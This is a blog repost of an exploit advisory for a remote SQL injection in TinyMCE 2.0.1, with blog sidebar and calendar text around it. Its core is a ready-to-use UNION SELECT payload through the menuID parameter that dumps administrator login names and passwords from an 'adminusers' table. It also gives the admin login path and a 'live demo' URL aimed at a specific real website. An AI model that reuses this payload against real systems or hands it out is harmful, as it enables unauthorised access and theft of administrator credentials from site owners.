TinyMCE SQL ін’єкція

TinyMCE Remote SQL Injection


************************************************************
** 		 TinyMCE Remote SQL Injection
************************************************************
**  Prodcut:		TinyMCE  Version 2.0.1
**  Home   : 		http://tinymce.moxiecode.com
**  Vunlerability :		2/ SQL Injection
**  Risk  :			high !!
**  Dork : 		N/A
************************************************************
** Discovred by:	AnGeL25dZ
** From	       :	Constantine - Algeria
** Contact     : 	angel25dz@gmail.com
** *********************************************************
** Greetz to :	 ALLAH
**		 All Members of HackTeachTeam	http://www.hackteach.org/
** 		 Ra3ch, His0k4
************************************************************
**  Remote SQL Injection vulnerability
**
** Exploit :index.php?menuID=-1 union select 0,Group_CONCAT
     (loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
**
** Use : http://[path]/Exploit
** Admin : http://[path]/cms/login.php
****************************************************************
** Live demo : http://www.uitgeverijginkgo.nl/index.php?menuID=-1
union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),
2,3 from adminusers
**
****************************************************************

Метки: injection, tinymce

Опубликовано 18 Гру 2008 в 14:05. Рубрика: Без категорії. Вы можете следить за ответами к этой записи через RSS 2.0. Вы можете оставить отзыв или трекбек со своего сайта.

Ваш отзыв

П	В	С	Ч	П	С	Н
« Лис				Січ »
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30	31

coolchevy's blog | Life and experience

TinyMCE SQL ін’єкція

RSS

Сторінки

Теґи

Календар

Популярні записи